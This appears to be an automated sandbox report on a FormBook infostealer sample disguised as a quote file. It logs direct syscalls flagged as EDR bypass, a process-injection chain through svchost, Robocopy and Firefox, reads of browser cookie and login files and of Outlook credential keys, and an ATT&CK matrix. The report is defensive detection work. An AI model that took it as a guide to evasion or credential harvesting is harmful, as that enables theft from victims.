            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D7B0 mov eax, dword ptr fs:[00000030h]2_2_0305D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F7BA mov eax, dword ptr fs:[00000030h]2_2_0302F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030357C0 mov eax, dword ptr fs:[00000030h]2_2_030357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303D7E0 mov ecx, dword ptr fs:[00000030h]2_2_0303D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03061607 mov eax, dword ptr fs:[00000030h]2_2_03061607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F603 mov eax, dword ptr fs:[00000030h]2_2_0306F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033616 mov eax, dword ptr fs:[00000030h]2_2_03033616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033616 mov eax, dword ptr fs:[00000030h]2_2_03033616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F626 mov eax, dword ptr fs:[00000030h]2_2_0302F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105636 mov eax, dword ptr fs:[00000030h]2_2_03105636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03069660 mov eax, dword ptr fs:[00000030h]2_2_03069660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03069660 mov eax, dword ptr fs:[00000030h]2_2_03069660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B368C mov eax, dword ptr fs:[00000030h]2_2_030B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D6AA mov eax, dword ptr fs:[00000030h]2_2_0302D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D6AA mov eax, dword ptr fs:[00000030h]2_2_0302D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030276B2 mov eax, dword ptr fs:[00000030h]2_2_030276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303B6C0 mov eax, dword ptr fs:[00000030h]2_2_0303B6C0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\Robocopy.exeThread register set: target process: 7724Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\Robocopy.exeThread APC queued: target process: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Quote #270924.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3CA008Jump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quote #270924.exe"Jump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Quote #270924.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
